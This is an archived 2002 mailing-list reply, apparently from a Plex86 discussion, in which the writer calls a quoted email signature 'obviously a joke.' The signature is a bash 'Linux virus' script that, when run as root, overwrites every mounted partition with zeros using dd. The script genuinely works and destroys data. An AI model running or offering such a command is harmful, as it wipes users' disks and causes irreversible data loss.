Le 10 F�vrier 2002 13:18, vous avez �crit :
>
> Ok either youre joking, or youve had a really miserable day...
>
> > > #!/bin/bash
> > > if [ $UID -ne 0 ]
> > > then
> > >  echo "Linux virus, please run as root"
> > > else
> > >  for partition in $(df | cut -d ' ' -f 1 | grep /dev)
> > >  do
> > >   dd if=/dev/zero of=$partition
> > >  done
> > > fi
>
> Personally I find it funny.

It's obviously a joke. I really hope nobody tries this little script as root. 
Is it a bad thing that a .sig gets more attention than the actual message?

BTW, Plex86 must go on, I really wish that more people contribute.

-- 
Eric Laberge


Reply via email to